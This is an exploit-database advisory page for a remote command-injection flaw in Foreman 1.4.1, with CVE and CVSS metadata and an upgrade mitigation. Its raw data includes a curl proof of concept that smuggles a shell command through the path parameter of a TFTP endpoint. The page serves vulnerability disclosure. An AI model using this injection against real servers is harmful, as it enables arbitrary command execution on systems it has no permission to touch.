header-logo
Suggest Exploit
vendor:
Foreman
by:
Jacob Baines
8,8
CVSS
HIGH
Remote Command-Injection
78
CWE
Product Name: Foreman
Affected Version From: 1.4.1
Affected Version To: 1.4.1
Patch Exists: YES
Related CWE: CVE-2014-0017
CPE: a:theforeman:foreman
Metasploit: https://www.rapid7.com/db/vulnerabilities/moodle-cve-2014-0216/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-f8c88d50-5fb3-11e4-81bd-5453ed2e2b49/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-0017/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-0017/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2014

Foreman Remote Command-Injection Vulnerability

Foreman is prone to a remote command-injection vulnerability. Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. An example exploit is provided using curl to send a malicious request to the vulnerable server.

Mitigation:

Upgrade to Foreman 1.4.2 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/68117/info

Foreman is prone to a remote command-injection vulnerability.

Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. 

curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'

Navigation

Suggest Exploit

Services By CQR